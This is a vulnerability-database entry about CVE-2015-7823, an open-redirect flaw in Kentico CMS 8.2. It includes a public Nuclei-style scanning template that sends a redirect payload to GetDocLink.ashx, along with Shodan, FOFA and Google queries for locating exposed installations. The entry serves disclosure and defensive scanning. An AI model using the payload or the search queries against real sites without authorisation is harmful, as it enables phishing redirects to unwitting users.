CVE-2015-7823: Kentico CMS 8.2 - Open Redirect

日期: 2025-08-01 | 影响软件: Kentico CMS | POC: 已公开

漏洞描述

Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.

PoC代码[已公开]

id: CVE-2015-7823

info:
  name: Kentico CMS 8.2 - Open Redirect
  author: 0x_Akoko
  severity: medium
  description: Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
  remediation: |
    Apply the latest security patches or upgrade to a newer version of Kentico CMS.
  reference:
    - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html
    - https://nvd.nist.gov/vuln/detail/CVE-2015-7823
    - http://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N
    cvss-score: 5.8
    cve-id: CVE-2015-7823
    cwe-id: NVD-CWE-Other
    epss-score: 0.13294
    epss-percentile: 0.93933
    cpe: cpe:2.3:a:kentico:kentico_cms:8.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: kentico
    product: kentico_cms
    shodan-query:
      - cpe:"cpe:2.3:a:kentico:kentico_cms"
      - http.title:"kentico database setup"
    fofa-query: title="kentico database setup"
    google-query: intitle:"kentico database setup"
  tags: cve2015,cve,kentico,redirect,packetstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# digest: 4a0a004730450220143f61247e71b3369b2404d65031db0e961f506e1c2a48ea94aa13791fe555a5022100c1ab62072e591c596f08407d9cfef20162f53940d23585b10b642ce090f6ea26:922c64590222798bb761d5b6d8e72950

相关漏洞推荐